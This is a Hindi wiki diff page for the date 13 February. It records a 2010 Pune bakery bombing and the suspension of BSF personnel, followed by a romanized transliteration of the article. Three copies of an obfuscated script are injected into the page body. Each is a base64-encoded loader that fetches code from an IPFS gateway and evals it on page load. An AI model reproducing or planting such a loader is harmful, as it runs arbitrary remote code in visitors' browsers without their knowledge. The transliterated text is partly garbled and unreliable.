Difference between revisions of "13 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
==13 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==13 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
* [[2010]]-
 
* [[2010]]-
** महाराष्ट्र के पुणे में यहूदियों के प्रार्थना स्थल के नजदीक बेकरी में शाम को हुए बम विस्फोट में पाँच महिलाओं और एक विदेशी नागरिक सहित नौ लोग मारे गए और 53 अन्य घायल हो गए।  
+
** [[महाराष्ट्र]] के [[पुणे]] में यहूदियों के प्रार्थना स्थल के नजदीक बेकरी में शाम को हुए बम विस्फोट में पाँच महिलाओं और एक विदेशी नागरिक सहित नौ लोग मारे गए और 53 अन्य घायल हो गए।  
** पाँच फ़रवरी को श्रीनगर के निशात इलाके में 16 वर्षीय छात्र जाहिद फारूक की गोली लगने से हुई मौत के मामले में बीएसएफ के कमांडेंट आरके बिरदी और 14 कर्मियों को निलंबित कर दिया गया।
+
** पाँच फ़रवरी को [[श्रीनगर]] के निशात इलाके में 16 वर्षीय छात्र जाहिद फारूक की गोली लगने से हुई मौत के मामले में बीएसएफ के कमांडेंट आरके बिरदी और 14 कर्मियों को निलंबित कर दिया गया।
 +
 
 
==13 फ़रवरी को जन्मे व्यक्ति==
 
==13 फ़रवरी को जन्मे व्यक्ति==
  

Revision as of 12:28, 19 June 2010

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 13 faravari varsh ka 44 vaan din hai. sal me abhi aur 321 din shesh haian. (lip varsh mean 322 din)

13 faravari ki mahattvapoorn ghatanaean

  • 2010-
    • maharashtr ke pune mean yahoodiyoan ke prarthana sthal ke najadik bekari mean sham ko hue bam visphot mean paanch mahilaoan aur ek videshi nagarik sahit nau log mare ge aur 53 any ghayal ho ge.
    • paanch faravari ko shrinagar ke nishat ilake mean 16 varshiy chhatr jahid pharook ki goli lagane se huee maut ke mamale mean bieseph ke kamaandeant arake biradi aur 14 karmiyoan ko nilanbit kar diya gaya.

13 faravari ko janme vyakti

13 faravari ko hue nidhan

13 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>